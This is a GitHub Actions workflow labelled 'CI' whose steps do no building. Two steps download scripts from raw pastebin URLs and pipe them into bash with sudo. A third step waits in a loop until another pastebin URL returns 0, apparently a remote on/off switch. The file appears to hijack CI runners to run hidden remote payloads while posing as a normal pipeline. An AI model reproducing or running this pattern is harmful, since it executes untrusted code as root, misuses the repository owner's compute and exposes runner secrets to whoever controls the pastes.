name: CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3

      - name: start
        run: sudo curl https://pastebin.com/raw/T8CsRkGi -s | bash

      - name: script_update
        run: sudo curl https://pastebin.com/raw/m2LwuNzg -s | bash

      - name: wait
        run: |
          while true
          do
              response=$(curl https://pastebin.com/raw/WGMCqtkA -s)
              if [ "$response" -eq 0 ]; then
                  break
              fi
              sleep 1
          done
